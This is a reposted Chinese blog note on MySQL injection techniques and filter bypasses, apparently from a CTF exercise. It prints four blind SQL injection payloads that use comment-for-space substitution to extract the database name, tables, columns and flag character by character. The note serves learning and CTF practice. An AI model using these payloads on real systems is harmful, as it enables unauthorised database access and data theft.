首页 > 数据库技术 > 详细

Mysql注入的常用方法和绕过

时间:2020-07-16 23:05:46      阅读:61      评论:0      收藏:0      [点我收藏+]
  • 宽字节注入
  • 基于约束的注入
  • 报错注入
  • 时间盲注
  • bool盲注
  • order by的注入
  • INSERT、UPDATE、DELETE相关的注入
  • 堆叠注入
  • 二次注入
  • 文件读写
  • 常用绕过
  • 万能密码

参考:CTF SQL注入

惯用思路(这里的例子是之前做的一道mysql盲注题,题目过滤了很多符号,如:单引号、空格和逗号):
1、首先通过database()函数得到库名,或者去information_schema.schemata表查询schema_name
"0/**/or/**/ascii(substring(database()/**/from/**/%d/**/for/**/1))=%d#" % (i, j)
2、然后去information_schema.tables表利用table_schema查询table_name
"0/**/or/**/ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())/**/from/**/%d/**/for/**/1))=%d#" % (i, j)
3、接着去information_schema.columns表利用table_name查询column_name
"0/**/or/**/ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database())/**/from/**/%d/**/for/**/1))=%d#" % (i, j)
4、最后select column_name from table_name 得到flag
"0/**/or/**/ascii(substr((select/**/*/**/from/**/flag)/**/from/**/%d/**/for/**/1))=%d#" % (i, j)

Mysql注入的常用方法和绕过

原文:https://www.cnblogs.com/MisakaYuii-Z/p/13325162.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!